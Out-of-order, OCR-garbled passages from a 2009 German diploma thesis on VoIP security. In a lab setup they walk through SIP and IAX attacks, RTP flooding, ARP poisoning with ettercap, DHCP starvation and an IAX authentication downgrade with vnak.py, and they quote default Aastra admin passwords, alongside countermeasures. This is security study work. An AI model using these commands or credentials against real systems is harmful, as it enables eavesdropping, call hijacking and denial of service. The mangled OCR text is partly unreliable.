352. slieferungszustand ist das Passwort 22727 Statusseite des Aastra 57i www_iptam com content view 91 83 22k Im Cache hnliche Seiten ror Aastra 53i 55i 57i Quick Start Guide f r VTX interne Zwecke Dateiformat PDF Adobe Acrobat HTML Version Dr via Aastra Web Ul Loggen Sie sich als Administrator ein und gehen Sie im Men 10 Password Passwort des SIP Kontos in 62000 11 RTP Port Base www vtx ch d2wfiles document 3732 7 0 Aastra_User_Guide_DE pdf Ahn Aastra 9133 VoIP Phone Setup Guide D ersetzen Make sure that the Aastra phone is powered on and plugged into the same router The default login is admin password 22222 Click on Global SIP from the www voiptalk org products aastra setup html 9k Im Cache hnliche Seiten N Gefunden wurde nebst anderen Eintr gen und Dokumenten auch ein Quick Start Guide eines Wiederverk ufers der eigentlich nur f r interne Zwecke bestimmt w re wrx Aastra Soi SSi 571 Quick Start Guide f r VTX Interne Zwecke ZZ ZZ mamamaZ ZZ Z Zm m m mam mm mm am m m m m W A gt N Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 42 oo Berner Fachhochschule teem Technik und Informatik Software Schule Schweiz In diesem Quick Start Guide ist der Administrator Account inklusive Standard Admin Passwort ausf hrlich beschrieben vr ACHTU
353. solche Angriffe unterbinden Siehe Massnahmen IDS Kapitel 8 5 15 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 125 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 5 4 2 Technik und Funktionsweise Der Angreifer h rt den Netzwerkverkehr nach RTP Sprachpaketen ab Sobald sein Angriffsziel aktiv in einem Gespr ch ist kann er sein Angriffs Tool entsprechend konfigurieren und den Angriff starten Damit das Angriffsziel die floodenden RTP Pakete akzeptiert und nicht gleich verwirft m ssen diese gespooft mit der IP und MAC Adresse ihres derzeitigen Gespr chspartners an dieses gesendet werden Auch m ssen die Pakete die korrekte SSRC Nummer beinhalten Diese Nummer identifiziert zus tzlich die empfangenen RTP Pakete mit der Identit t des Gespr chspartners Dazu wird die MAC Adresse verwendet Wenn das Angriffsziel RTP Pakte mit der gleichen SSRC Nummer erh lt wie sie schon im aktuellen bestehenden Gespr ch vorkommen werden die Pakete akzeptiert und gepr ft Gepr ft wird der Zeitstempel eines jeden einzelnen Paketes um festzustellen ob dieses Paket noch verwendet werden kann oder verworfen werden muss M ssen nun infolge des Flooding Angriffs sehr viele RTP Pakete gepr ft werden ist das Angriffsziel berlastet und es kommt zu grossen Verz gerungen dem Verwerfen der RTP Pakete bis hin zum kompletten Ver
354. sse Systemleisbung Netzwerk CPU Ausisstung Verlauf der CPU Auslastung Auslagerungsdatei Verlauf Ger Ausiagerungsdateiauslastung Insgesamt Physikaiischer Speicher KB Handles 42373 Insgesamt 1047932 Thresds 479 Verf gbar 649396 Prozesse 9 Systemcache 217704 Zugescherter Speicher KB Kernel Speicher KB Insgesamt 43020 Insgesamk 71372 Grenzwert 2519416 Ausgelagert 30452 Maxtnaiwert 496020 Nicht ausgelagert 40920 Prozesse 49 CPU Ausiastung 100 Zugesicherter Speicher 484M Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 178 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 6 12 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Die Folge davon ist eine 100 Prozessorauslastung bis hin zum Absturz des Rechners Ein somit angegriffener VOIP Server ist innert k rzester Zeit ausser Funktion und dadurch die ganze VOIP Infrastruktur ausser Betrieb gesetzt DoS Denial of Service Dieser Angriff ist als besonders gef hrlich einzustufen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 179 oo Berner Fachhochschule teem Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 7 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 180 oo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 7 Diplomarbeit VOIP S
355. st die einzige Unbekannte das Passwort Dies erlaubt es mit einer offline Dictionary Attacke den MD5 Hashwert gegen eine sehr grosse Anzahl m glicher Passw rter zu testen 3 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer hat Wireshark gestartet h rt den Netzwerkverkehr mit und zeichnet diesen auf Sobald die periodische Registrierung des Angriffszieles erfasst werden konnte ist der Angreifer im Besitz aller notwendigen Daten um nachher die offline Dictionary Attacke starten zu k nnen Damit der Angreifer die im Netzwerk ausgetauschten Nachrichten welche ber andere Switch Ports gehen empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Untenstehender Wireshark Ausschnitt zeigt wie der Benutzer 4131 in Paket Nr 18 einen Registrierungs Request an den Asterisk Proxy Server sendet In Paket Nr 19 sendet der Proxy Server den Challenge 240491225 an den IAX Client 4131 zur ck Mit diesem Challenge und seinem Passwort hat der Client den MDS5 Hashwert zu bilden welchen er an den Asterisk Proxy Server zur cksenden muss Capture Analyze Statistics Help Expression Clear Apply No Time Source Destination Protocol Info ee A 2 Wire Dyte5 captured Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 DSt Compal n_0b ad 96 00 1le ec 0b ad 96 Internet Protocol src 10 1 1 101 10 1 1 101
356. st ein Name fiir die neu zu erstellende virtuelle Maschine anzugeben Mittels next ist dieser zu best tigen amp Create Virtual Machine gt and Location _ Name and Location Guest Operating System fi Enter a descriptive name for your new virtua machine and specify the Memn ny and proosssors datastore where its configuration files will be saved Name SackTrack Hard Disk Properties standard Network Adapter Properties CD DVD Drive Properties Floppy Drive Properties USS Controller Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 21 Berner Fachhochschule Technik und Informatik Software Schule Schweiz Als Operating System wird Linux und als Version Other Linux 32 bit angegeben und mittels next best tigt Select the operating system you plan to install in your virtual machine Your selection will be used to recommend settings and optimize Memory and Pro performance Once the virtual machine has been created you will need to install this operating system from your own installation disc Hard Disk Properties windows operating system Novell Netware C Solaris operating system Lion osscatoo Ssusis n X Other operating systems other Linux 32 bit ee Operating System Network Adapter Properties CD DVD Drive Properties Version Floppy Drive Properties Product Compatibility USB Controller Der gewiinscht
357. stration 0x13 Length 2 when to refresh registration 300 amp Information Element MD5 challenge result 3ascotel IE id MD5 challenge result 0x10 D 3 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Sniffen des Passwortes kann ein Registrations Hijacking gemacht werden das heisst der Angreifer kann ein anderes Terminal mit denselben Registrierungsdaten in das Netzwerk bringen Ankommende und abgehende Verbindungen werden ab diesem Moment ber dieses Terminal gef hrt Somit kommt der Angreifer auch in Kenntnis ankommender Anrufe welche beim Angriffsziel rufen sollten Auch kann er sich sowohl f r ankommende wie auch f r abgehende Gespr che unter falscher Identit t am Terminal melden Das F hren abgehender Gespr che auf Kosten anderer ist somit auch m glich Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 89 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 3 4 1 IAX Authentication dictionary Attack Integrit t nennen x Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x IAX Brute exe Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http www isecpartners com iax_brute html Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Tool 4
358. swirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 67 2 11 1 Denial of Service BYE Message 68 2 11 2 Technik und Funktionsweise 69 2 11 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 69 2 11 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 71 2 12 1 Denial of Service INVITE Flood 72 2 12 2 Technik und Funktionsweise 73 2 12 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 73 2 12 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 76 2 13 1 Denial of Service with Fuzzing SIP 77 2 13 2 Technik und Funktionsweise 78 2 13 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 78 2 13 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 82 3 IAX IAX2 Inter Asterisk eXchange Protocol Einf hrung 83 3 1 1 AX Header 83 3 1 2 Exemplarischer IAX IAX2 Verbindungsaufbau und Verbindungszust nde 84 3 2 1 Enumeration IAX User 85 3 2 2 Technik und Funktionsweise 86 3 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 86 3 2 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 87 3 3 1 IAX Authentication sniffing password Attack 88 3 3 2 Technik und Funktionsweise 89 3 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 89 3 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 89 3 4 1 IAX Authentication dictionary Attack 9
359. sziel gehen von diesem Angriff aus Ein Angreifer hat mit dem Einsatz dieses Tools folgende M glichkeiten Alle Verbindungs Anfragen INVITE Nachrichten zu einem nicht existierenden Ziel umzulenken Es k nnen somit keine neuen Anrufe mehr aufgebaut werden Alle Verbindungs Anfragen INVITE Nachrichten zu einem bestimmten internen User Agent umzulenken Dieser User Agent wird berflutet mit ankommenden Anrufen kann gleichzeitig nur mit einem Gespr chspartner kommunizieren dadurch gehen viele Anrufe verloren Gezielte Verbindungsanfragen INVITE Nachrichten zu sich selber umleiten um somit an die gew nschten Informationen zu kommen Auch kann er sich mit falscher Identit t am Telefon melden um so noch zu mehr Informationen zu kommen wenn zum Beispiel die User Agents einer EDV Hotline redirectet werden gt dann meldet sich der Angreifer als Hotline Mitarbeiter und erfragt Passw rter welche er dann f r weitere Nicht VOIP Angriffe einsetzen kann Auch k nnen SIP Trunk Anschl sse Amtsanschl sse auf genau die gleiche Weise redirectet werden Das Angriffsziel ist somit f r ankommende Anrufe nicht mehr erreichbar F r einen Betrieb mit einemTelefonverkauf kann dies enorme finanzielle Verluste zur Folge haben Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 64 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse g
360. t ausschliesslich jedem Ger tehersteller die Sicherheitsl cken Vulnerabilities katalogisiert nach Device aufgef hrt sind Mit Hilfe dieser Information kann es einem Angreifer sehr einfach gelingen an Informationen wie Registrationsdaten private Telefonb cher Anruf und Wahlwiederholungslisten welche in den Terminals gespeichert sind heranzukommen oder diese mittels gezieltem Angriff durch das Wissen bestimmter Sicherheitsl cken zu attackieren Schutz gegen Angriff Analyse Eine wirksame Schutzmassnahme ist schwierig zu realisieren Oftmals werden unabsichtlich Administratoren Manuals in den ffentlichen Bereich des Internets gestellt oder Bedienungsanleitungen und Dokumentationen mit unbekanntem Inhalt grobfahrl ssig verteilt Einzige m gliche Massnahmen sind Keine Standardpassw rter in den Terminals und Adminbereichen der Registrar SIP Proxy Servern verwenden Klare Richtlinien beim Ger tehersteller was Dokumentationen und deren Freigabe betrifft Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 41 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 2 4 2 Technik und Funktionsweise Das Internet wird gezielt mit den aus der Enumeration gewonnenen Informationen nach Standard Admin Passw rtern und Vulnerabilities abgesucht Dabei empfiehlt es sich sowohl ger te wie auch herstellerspezifisch zu Suchen Sehr oft werden beim Endku
361. t verglichen werden wo von Projektphase zu Projektphase gearbeitet wird Die Suche nach Tools die Angriffe sowie die jeweilige Auswertung erfolgten parallel Deshalb konnten den gem ss Projektmanagement vorgeschriebenen Projektphasen keine grosse Beachtung geschenkt werden und wurden bewusst nicht aufgef hrt Das im Anhang angef gte Arbeits Logbuch best tigt den oben angesprochenen Aufwand Ebenfalls m chte ich noch erw hnen dass jede aufgewendete Minute f r diese Diplomarbeit in meiner Freizeit erfolgte Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 196 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 10 Ausblick Die Verbreitung von VOIP im professionellen Umfeld wird in den n chsten Jahren stark ansteigen mit ihnen auch die Angriffe Mit der immer steigenden Nachfrage nach diesen Systemen werden auch die Erfahrungen betreffend VOIP Sicherheit immer gr sser Dieses Wissen wird von seitens der Entwickler solcher Systeme in die Implementierung neuer Sicherheitsmerkmale einfliessen Durch die M glichkeit der Sprachdaten Verschl sselung w rde VOIP heute schon eine Auswahl an Schutzmechanismen bieten Jedoch fehlen seitens der Ger tehersteller die dazu n tigen Implementierungen welche eine Realisierung der Sprachdaten Verschl sselung in einem vern nftigen Kostenbereich zulassen w rde Hier besteht auf jeden Fall f r zuk nftige Endsysteme ein grosser Handlungsbedarf
362. t wann mit wem und dem Gespr chsinhalt RTP Sprachpakete selbst Benutzernamen und Passw rter k nnen f r weitere Angriffe eingesetzt werden Durch diesen Angriff kann der Angreifer auch nicht VOIP spezifische Informationen erhalten wie zum Beispiel Gesch ftszahlen Kunden Kontakte oder geheime Firmeninformationen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 145 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz http ettercap sourceforge net Das Tool ist ebenfalls in BackTrack3 enthalten Hinweise zu Installation Verf gbarkeit Das Tool ist in BackTrack3 enthalten Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Benennung Angriffe Analyse Angriff Analyse gegen 6 4 1 STP Angriff Integrit t shite ernennen Vertraulichkeit Eingesetztes Tool Verf gbarkeit ettercap Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert X X X Ziel Angriff Analyse Spanning Tree ist ein Protokoll welches es erlaubt redundante Netze aufzubauen Dabei gibt es immer nur einen einzigen aktiven Weg zu einem Switch die anderen redundanten Verbindungen werden auf Stand by geschaltet Dies soll Schleife
363. t werden Andererseits ist auch eine DoS Denial of Service Attacke auf die Verf gbarkeit der Hosts IP Telefone und VOIP Server m glich Der Angreifer kann den Angriffszielen einen nicht existierenden Default Gateway mitteilen Dadurch werden die f r ins Internet bestimmten Daten respektive Sprachstreams ins Leere umgelenkt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 167 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 6 10 1 DHCP Starvation DHCP Rouge Server Tmteerit t ne A Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x yersinia Downloadlink Quelle des Tools Schweregrad http www yersinia net download htm 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Tool 5 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 6 Ziel Angriff Analyse Meistens bekommen die VOIP Terminals ihre Netzwerkkonfiguration per DHCP zugewiesen Bei dem DHCP Starvation Angriff versucht der Angreifer alle verf gbaren IP Adressen f r sich zu beanspruchen Die VOIP End
364. te zum Angriffsziel welches jetzt nur noch die Pakete an den jeweils richtigen Host weiterleiten muss Ettercap bernimmt all diese Funktionen automatisch Was ist ARP Was ist ein ARP Cache Jeder Host hat einen kleinen Pufferspeicher den ARP Cache Darin sind verkn pft die MAC Adressen mit den IP Adressen der Kommunikationspartner abgelegt Beim Senden der Datenpakete schaut der zu sendende Host immer zuerst in seinem ARP Cache nach ob die MAC Adresse des gew nschten Kommunikationspartners bei sich abgelegt ist Ist dies der Fall so sendet der Host die Pakete direkt an das gew nschte Ziel ansonsten wird lokal im Netzwerk mittels ARP Request nach der MAC Adresse gefragt Der Angreifer manipuliert mittels dieses Angriffs den ARP Cache des Angriffziels und erzeugt somit falsche IP MAC Adressen Zuordnungen 6 1 3 Ausgangssituation Ablauf und Bedingungen f r Angriff User Agent 4111 und User Agent 4129 sind aktiv miteinander in einem Gespr ch Alle RTP Sprachpakete laufen w hrend der Verbindung immer ber den Asterisk Proxy Server Ziel des Angreifers ist es das Gespr ch der beiden User Agents mitzuschneiden respektive mittels Wireshark aufzuzeichnen Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet ettercap w logfileARPPoisoning pcap gtk Die Werte im Einzelnen stehen wie folgt f r ettercap Startet ettercap w logfileARPPoisoning pcap Speichert die gesnifften Daten
365. tellung Dokumentation Diplombericht Teilerstellung Dokumentation Diplombericht Teilerstellung Dokumentation Diplombericht Korrekturlesen Teilerstellung Dokumentation Diplombericht Angriffe gegen das IAX Protokoll Angriffe gegen das IAX Protokoll Angriffe gegen das IAX Protokoll Angriffe gegen das IAX Protokoll Umstellen der Testumgebung f r Infrastrukturtests Teilerstellung Dokumentation Diplombericht Angriffe gegen die Netzwerkinfrastruktur Angriffe gegen die Netzwerkinfrastruktur Abschliessende Angriffe gegen das IAX Protokoll Angriffe gegen die Netzwerkinfrastruktur Angriffe gegen die Netzwerkinfrastruktur Angriffe gegen die Netzwerkinfrastruktur Nachtragen IAX Resultate Neukonfiguration Testumgebung Angriffe gegen die Netzwerkinfrastruktur Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 4 5 3 5 wa oa 10 5 5 35 D www NAW Seite 225 Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag 17 01 2009 18 01 2009 19 01 2009 20 01 2009 21 01 2009 22 01 2009 23 01 2009 24 01 2009 25 01 2009 26 01 2009 27 01 2009 28 01 2009 29 01 2009 30 01 2009 31 01 2009 01 02 2009 02 02 2009 03 02 2009 04 02 2009 05 02 2009 06
366. terfaces beinhaltet xl Eigenschaften von Internetprotokoll TCP IP 2h i Eigenschaften von Netzwerk Allgemein Authentizierung Erweitert Allgemein Alternative Konfiguration Adapter IP Einstellungen k nnen automatisch zugewiesen werden wenn das Netzwerk diese Funktion unterst tzt Wenden Sie sich andernfalls an W hlen Sie die Adapter die f r die Verbindungsherstellung mit den Netzwerkadministrator um die geeigneten IP Einstellungen zu Computern im lokalen Netzwerk verwendet werden sollen beziehen LAN Verbindung v LAN Verbindung 2 Sh VMware Network Adapter VMnet1 Folgende IP Adresse verwenden m IP Adresse m En Subnetzmasker TEE Stendardgateway rel DNS Serveradresse automatisch beziehen i Folgende DNS Serveradressen verwenden M Intemetprotokoll TCPAP BeyorzutenDNN lserverr 5 be g Biternatiwer DNS Server D 4 Ihst llereni Deinstalliereri Eigenschaften I Symbol bei Verbindung im Infobereich anzeigen Erweitert Abbrechen Abbrechen Diese Yerbindung verwendet folgende Elemente 7 Netzwerkmonitortreiber Nach dem Starten von Ettercap muss die Netzwerkbr cke als aktives Netzwerkinterface angegeben werden ber dieses Interface werden die gef lschten BPDU Pakete ins Netzwerk gesendet welche den vorhanden Switches im Netzwerk die Pfadkosten mitteilt T st Ioj
367. tig sind Somit bietet BackTrack3 eine vorinstallierte Basis f r weitere linuxbasierte Angriff Tools welche selbst nicht in BackTrack3 enthalten sind Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet vnak py a 0 iethO 10 1 1 151 10 1 1 101 Die Werte im Einzelnen stehen wie folgt f r vnak py Aufruf Tool in Python Umgebung a0 Es soll die Downgrade Attacke von vnak ausgef hrt werden ethO Besagt tiber welche Schnittestelle des PC s die Daten gesendet werden sollen 10 1 1 151 IP Adresse des Zielobjektes an welche die gespoofte Antwort gesendet wird 10 1 1 101 IP Adresse des Asterisk Proxy Servers Krk bt vnak py a 0 iethO 10 1 1 151 10 1 1 101 vnak VoIP Network Attack Kit iSEC Partners Copyright 2007 lt c gt http www isecpartners com Written by Zane Lackey Authentication Downgrade attack completed succesfully against host 10 1 1 151 Authentication Downgrade attack completed succesfully against host 10 1 1 151 Authentication Downgrade attack completed succesfully against host 10 1 1 151 Authentication Downgrade attack completed succesfully against host 10 1 1 151 RK Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 94 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz Untenstehend sendet IAX Client 4131 in Paket Nr 33 einen Registration Request an den Asterisk Proxy Server In Paket Nr 34 erh lt er
368. tokolle fiir Pflichtenheft Sitzung mit Betreuer Eruierung der Tools und Protokolle fiir Pflichtenheft Beginn Erstellung Pflichtenheft Eruierung der Tools und Protokolle fiir Pflichtenheft Eruierung der Tools und Protokolle fiir Pflichtenheft Erstellung Pflichtenheft Erstellung Pflichtenheft Organisation Material fiir die Testumgebung Sitzung mit Betreuer Organisation Material fiir die Testumgebung Beginn Aufbau der Testumgebung Uberarbeitung Pflichtenheft Feinschliff Pflichtenheft Sitzung mit Betreuer Aufbau Testumgebung Labor Setup Installation IAX Server Asterisk und Einarbeitung Installation Ubuntu Server Start Angriffe gegen SIP Enumeration web search vendor specific Angriffe gegen SIP Authentication Attacken falsche Tools kein Fortschritt Installation Vmware Server Angriffe gegen SIP Authentication Attacken kein Cracken des PW m glich Kurs Pr sentationstechnik Bern Review mit Experte Angriffe gegen SIP Authentication Attacken Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Aufwandh 6 5 4 5 3 5 4 5 6 5 12 o mo Seite 224 Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienst
369. tos Test Suite gesendeten INVITE Nachrichten zu sehen Fragmentierte und ungiiltige INVITE Nachrichten testen das Angriffsziel auf dessen Verhalten Der Ausschnitt reflektiert nur einen kleinen Teil der gesendeten Nachrichten wie sie in diesen 3 Angriffen an das jeweilige Angriffsziel gesendet wurden 1049 28 220496 10 1 1 107 10 1 1 101 1050 28 220681 10 1 1 107 10 1 1 101 Fragmented IP protocol proto uDp 0x11 off 62160 Fragmented IP protocol proto uDP 0x11 of f 63640 HH DU 845317 T 1 Fragmented protocol proto UDP off 0 845550 my Bs iS a Fragmented protocol proto uDP of f 1480 1059 28 845675 10 1 1 4 Fragmented protocol proto UDP of f 2960 1060 28 845807 10 1 1 a Vi Fragmented protocol proto UDP of f 4440 1061 28 845926 10 1 1 o Fragmented protocol proto UDP of f 5920 1062 28 846084 10 1 1 ce Fragmented protocol proto UDP of f 7400 1063 28 846231 adds ee Fragmented protocol proto UDP of f 8880 1064 28 846448 1 ai Fragmented protocol proto UDP off 10360 1065 28 846578 10 1 1 107 10 1 1 101 S5IP SDP Request INVITE 90 999 1066 28 951700 10 1 1 107 10 1 1 101 SIP SDP Request INVITE sip sip no invalid with session descriptio 1067 29 055071 10 1 1 107 10 1 1 101 SIP SDP Request INVITE sip s5ip no invalid with session 1068 29 159375 10 1 1 107 10 1 1 101 STP SDP Request INVITE Sipiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiisip no inval 1069 29 263071 10 1 1 107 10 1 1 101 SI
370. truktur respektive Testumgebung auszuf hren Nicht selten werden solche Angriffe innerhalb des eigenen IP Netzes ausge bt sei es b swillig oder als Folge gelangweilter Mitarbeiter Angriffe von ausserhalb des eigenen Netzwerkes entsprechen durchaus denselben Praktiken wie sie in dieser Arbeit aufgezeigt werden sollen Dazu muss jedoch in der Regel eine weitere Sicherheitsh rde berwunden werden die Firewall Ist diese jedoch einmal berwunden gelten ann hernd dieselben Bedingungen wie intern im LAN 1 2 Aufbau dieser Arbeit Ein kurzer berblick der Testumgebung soll die sp teren Angriffe und deren Beschreibungen verst ndlicher machen Danach wird die Installation des Angriff Tools BackTrack3 aufgezeit welches in Verlaufe dieser Diplomarbeit am meisten eingesetzt wurde Eingangs eines jeden Kapitels wird eine kurze Einf hrung in das zu testende Protokoll oder die zu testende Umgebung Technik gemacht Diese Einf hrung ist kurz gehalten sie soll lediglich dazu dienen die jeweils nachfolgenden Angriffe verstehen zu k nnen Aus diesem Grund wird sich dieser Diplom Bericht wesentlich von anderen unterscheiden Das Hauptmerkmal liegt in der praktischen Anwendeung der Angriff Tools deren Folgen sowie der gegen die Angriffe m glichen Gegenmassnahmen Ist die Einf hrung in das jeweilige Themengebiet einem Leser zu oberfl chlich hat er die M glichkeit sich anhand der eingef gten Links weiter zu informieren Zu Beginn eines jeden Angri
371. tungsf higeren Prozessoren in den Terminals ist jedoch eine Verbesserung hinsichtlich der Medienstrom verschl sselung nur noch eine Frage der Zeit Die PBX Ascotel Intelligate zeigte sich als sehr robust Weder das Fuzzen noch das INVITE Flooding brachte die PBX in eine instabile Situation Alle Dienste waren zur jeder Zeit verf gbar Auch die Authentifizierungs Angriffe konnten nicht mit Erfolg beendet werden die MD5 Hashwerte f hrten nicht zu den Passw rtern wie dies bei den anderen get tigten Angriffen gegen SIP und IAX gelang Viele Dokumente und Behauptungen betreffend der Einfachheit der VOIP Angriffe wurden im Verlaufe dieser Diplomarbeit im Internet gefunden und gelesen Es war von Skript Kiddies b sen Schuljungen bis hin zur Netzwerk abh renden Sekret rin die Rede Oftmals beim Vergleichen dieser Dokumente und Behauptungen kam das Gef hl auf dass es sich dabei um ein Nachsagen und gegenseitiges Aufwiegen unbest tigter Meldungen handelt Sehr oft glichen sich Dokumente fast bis ins letzte Detail und die meisten endeten mit immer gleichem Schema es fehlten jeweils Details und Hinweise die f r den erfolgreichen Angriff wichtig und von Bedeutung gewesen w ren Der Verdacht liegt nahe dass sehr viele dieser Dokumente nichts anderes als abgeschriebene Versionen eines anderen Dokumentes sind welches den Inhalt vom H rensagen widerspiegelt Viele der getesteten Angriff Tools erfordern ein tiefes und umfasse
372. tween the selected host on the left list and all selected hosts on the right list in both directions If a selected host has routing capabilities WAN traffic will be intercepted as well Please note that since your a APR FTPS 0 machine has not the same performance of a router you could cause DoS if you set APR between your Default Gateway and APR POP3S 0 all other hosts on your LAN f APR IMAPS 0 8 APR LDAPS 0 10 1 1 1 OO0FCC217914 10 1 1 101 001422F02243 10 1 1 102 0016E35B3F46 10 1 1 103 DOSOFOSF amp E7BI 10 1 1 121 00085D19408F 10 1 1 121 00085D19408F 10 1 1 103 OOSOFO5F67B9 10 1 1 102 0016E35B3F46 10 1 1 101 001422F02243 10 1 1 1 OOOFCC217914 IP address mac Hostname IP address TE MAC IH ostname Lost packets 0 Zur bersicht und Kontrolle werden die ausgew hlten Angriffsziele im Tab APR nochmals aufgelistet Der Angriff wird gestartet mittels dem dritten Icon von links in der oberen Taskliste gelb schwarz File View Configure Tools Help al ir Ummm wow Oe 2 se iL EA Decoders Network Sniffer I Cracker a Traceroute CCDU 163 2 Wireless Query Status IP address MAC address MAC address IP address 10 1 1 151 001CC007F350 000FCC217914 10 1 1 1 B APR FTPS 0 APR POP3S 0 APR IMAPS 0 APR LDAPS 0 Status IP address MAC address lt Packets MAC address IP address Configuration Routed Packets Passwords
373. tzten Protokolle Kann der Anwender sicher sein dass kein Unbefugter mith rt Die Vielfalt der eingesetzten Protokolle mit VOIP macht es auch nicht leichter den berblick wahren zu k nnen Mittels Analysen und gezielten Angriffen soll VOIP bez glich Integrit t Vertraulichkeit und Verf gbarkeit untersucht und die daraus gewonnenen Erkenntnisse und Gegenmassnahmen betreffend der Gefahren aufgezeigt werden Die Diplomarbeit inklusive aller Berichte und aufgezeichneter Logdateien richtet sich an Zielpersonen welche sich bereits mit dem Thema VOIP auseinander gesetzt haben Es wird daher auf ein Einf hrungskapitel bez glich VOIP Telefonie verzichtet und vorausgesetzt dass beim Leser des Diplom Berichtes bereits ein Grundwissen in Richtung IP Netzwerke und VOIP Telefonie vorhanden ist 1 1 _ Zielsetzung der Arbeit Die heute am meisten eingesetzten und verbreiteten Signalisierungs und Sprachtransport Protokolle f r VOIP Verbindungen sollen bez glich Sicherheit untersucht und getestet werden Die Arbeit soll keine Zusammenfassung schon bestehender Dokumentationen betreffend VOIP Sicherheit sein welche zur Gen ge im Internet auffindbar sind Es soll vielmehr aufgezeigt werden wie leicht mit welchen frei verf gbaren Tools und Angriffen VOIP Verbindungen abgeh rt respektive manipuliert werden k nnen Das Schwergewicht dieser Arbeit lastet daher im praktischen Einsatz genannter Analyse und Angriffstools gegen die VOIP Sicherheit Die A
